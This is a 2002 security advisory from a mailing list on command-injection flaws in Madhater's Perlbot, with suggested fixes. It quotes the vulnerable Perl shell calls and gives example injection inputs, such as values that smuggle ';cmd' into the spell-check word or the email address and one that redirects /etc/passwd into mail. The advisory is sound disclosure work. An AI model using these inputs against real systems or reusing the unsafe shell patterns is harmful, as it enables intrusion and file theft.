[UNIX] Madhater Perlbot Remote Command Execution

From: support@securiteam.com
Date: 10/19/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 19 Oct 2002 03:36:50 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Madhater Perlbot Remote Command Execution
------------------------------------------------------------------------

SUMMARY

A security vulnerability in <http://stigmata.gothcafe.com/~madhater/>
Madhater's Perlbot allows remote attackers to cause the product to execute
arbitrary code.

DETAILS

Vulnerable systems:
 * Perlbot version 1.0 beta

1. Due to no input filtering and a call to the shell the script could be
used to execute any command it has permission to.

A more detailed explanation:
The script does not limit the characters sent to the shell from user
input. The problem is in this line:

 foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

Which allows an attacker to "break out" of the quotes and issue any
command they wish by doing something like anything";cmd. Other abuses
could be issuing commands with `cmd` and $(cmd) or \xxx where xxx is the
octal value of any character. Some form of user input filtering must be
used.

2. Due to no input filtering and a bad open() call when the script
attempts to send email it is possible to execute commands.

A more detailed explanation:
The script attempts to send an email to the user. It takes the user's
email address and passes it to the shell as an argument to the mail
program:

 open (MAIL,"| $sendmail $recipient") || die $!;

This means things like hacker@scan-associates.net < /etc/passwd could be
used as an email address to get any file from the system the script has
permission to read. Or command execution is possible with
hacker@scan-associates.net ;cmd. In order to prevent this simply take the
$recipient value out of the shell call.

Fix:
According to the author a fix could be in a new version of the script.
The script's homepage was down at the time of this advisory, so here is
the suggested fix. Replace the following line:

 my $word=$';

With:

 my $word=$';
 $word =~ s/[^\w]//g;

And replace the following line:

 open (MAIL,"| $sendmail $recipient") || die $!;

With:

 open (MAIL,"| $sendmail -t") || die $!;

Vendor Contact:
07-22-02 - guejez emailed myneid@gothcafe.com and alerted him of this
vulnerability.
07-22-02 - guejez received email confirming vulnerabilities and stating
fixes could be in new version.

ADDITIONAL INFORMATION

The information has been provided by <mailto:guejez@scan-associates.net>
guejez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages